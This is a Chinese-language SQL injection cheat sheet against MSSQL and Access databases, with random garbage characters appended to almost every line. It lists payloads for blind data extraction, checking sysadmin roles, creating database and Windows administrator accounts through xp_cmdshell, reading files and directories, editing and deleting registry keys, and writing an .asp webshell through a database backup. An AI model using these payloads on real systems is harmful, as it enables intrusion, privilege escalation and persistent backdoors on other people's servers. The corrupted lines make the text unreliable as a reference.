1.判断是否有注入;and 1=1 ;and 1=2 �%��9D@W*Z
2.初步判断是否是mssql ;and user>0
<@vE��3v;
#w�jB��MR%
3.注入参数是字符'and [查询条件] and ''=' �'j�3'�n0o
w%_BX3G�TO
4.搜索时没过滤参数的'and [查询条件] and '%25'=' bp��$j�D�
Q~��@8t"P�
5.判断数据库系统 g^C6"rsn�l
nDOIE���)#
;and (select count(*) from sysobjects)>0 mssql 7}x-({bqy
2�DC#PX)i
;and (select count(*) from msysobjects)>0 access �=0)^![y]v
!xc7~D@om(
OX`�n`+^�D
f!�J^��vDl
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \O:xw-eG
�
F:�@I�xk?E
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 UJH{v�jI�v
$~YuS_sYg�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5�VT��bW �
`�SwnK���g
9.(1)猜字段的ascii值(access) lew�DR"0Kx
+n,�BD �C;
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Xp��~]kRm9
X2uX+}h*tA
(2)猜字段的ascii值(mssql) }gW}�Vr� <
u7�=[�~l&L
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �0�|ps�),�
K�(���d!0S
10.测试权限结构(mssql) VL{#�.;QQa
W*<�]�`U_.
��EDo@J2A�
�2 Q�m�Ug
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��8[�C6L�G
5G<�CDgl^!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- F&��*M$@u5
QRlzGRueR&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �i�W�?9oe�
lz��(,;I'x
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �^PQV3\N��
gxOmbQt@;�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- +_eb�*Z`5o
B0i}�Y-Z��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �Y*k<NeDyn
XX�-T�"�,
;and 1=(select IS_MEMBER('db_owner'));-- '��D&G�~�$
C.�E>���)�
.dCP�8���|
S7a�6n�tei
11.添加mssql和系统的帐户 u mlZ(??.
*?D2gaCta�
;exec master.dbo.sp_addlogin username;-- 5uo(z,�WLR
;exec master.dbo.sp_password null,username,password;-- ? ~�Z�r��d
F?�} �*ovy
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8��u��xFXQ
Z��5Ihc%J^
;exec master.dbo.xp_cmdshell 'net user username password j��#,�M@CE
#�`4^zU�)�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ~{YgM/c|dt
MN�qy�Ec""
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #L.}Cz��Az
eH955[fVd4
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �?ev G=S4>
+�)JqEwCrq
pMp9�O/u�%
W�<9��1�m*
12.(1)遍历目录 -�Y��=c g;
^�3|$w��B=
;create table dirs(paths varchar(100), id int) M�3@fc,Ch�
~�c�Bc&u:"
;insert dirs exec master.dbo.xp_dirtree 'c:\' R9�/xC7�l@
&�NjZD4m`=
;and (select top 1 paths from dirs)>0 �DG�*o
w^
�sLa)~To�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �!VX_'GyK�
oH��X�W])[
�o>;0NF| }
.c��S�,T<$
(2)遍历目录 M(z��Y[O��
�Y��m{%"EB
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �il��p;@O6
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 1�1<@++,i
l�iw 9:@+V
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 gQd�=0"MV�
`V):V4!j),
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 w+�9C/U;|s
a]���Da`$T
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��oB06�{/6
|z|)r"*\4�
5;�MK��1l
%��r���� �
13.mssql中的存储过程 A�zO3�(1�:
N�a�� 9�l#
xp_regenumvalues 注册表根键, 子键 k3�/JQ]'D�
Pv� %vx U�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 H�rg=��sR
aU.��0dsq�
xp_regread 根键,子键,键值名 o����j(A`[
:�KV,:13`D
;exec xp_regread m wEVEx2�4
2m�G&@���E
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 1�Q&WoJLfR
>RL6Jbo�|
xp_regwrite 根键,子键, 值名, 值类型, 值 G<�u.�+�V�
:B�v&)�RK�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ^,Y�~�M_=
�`Ym�I'���
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 vi!��r�8k
�IJ_�'w[k
xp_regdeletevalue 根键,子键,值名 :S�99}p�gY
4�&]�To�@>
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 V:G�}=~+�=
'tV"^K�QHI
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 z@%/r~�?�|
|Y8M�k2�,s
�i_9Cc$Qh<
��Y6f+__O�
14.mssql的backup创建webshell �cGpN4|*rQ
))CXjwLj;�
use model :L [��Y�mZ
C;�)�Xwm>e
create table cmd(str image); @q�{:O�c^�
_!C)r*�0�(
insert into cmd(str) values (''); =�hugnX<�9
B'KXQa�-$O
backup database model to disk='c:\l.asp'; �e�k(kY6x:
9&XV}I,~?|
�v�'t6
yud
7��>t$�<J�
15.mssql内置函数 � J�:~�[�j
vh. Wm?�qQ
;and (select @@version)>0 获得Windows的版本号 hk7�(2j7�B
2�sd �) w�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa y,y/P�y�N)
<i:*�p1#Bm
;and (select user_name())>0 爆当前系统的连接用户 �'.%i�P�MM
>��ggk>�s|
;and (select db_name())>0 得到当前连接的数据库 U�+9-�l�i�
t��y��n�?o
9*�-pden
l
r3[t<x�lFf
16.简洁的webshell F=���
_uNq
�n!kk~65�|
use model <4�l.���s�
&�AQg'|��
create table cmd(str image); h��\D_���
�a%M�zN��H
insert into cmd(str) values (''); (<]\�,pP0_
_X���Y`UZ�
backup database model to disk='g:\wwwtest\l.asp';
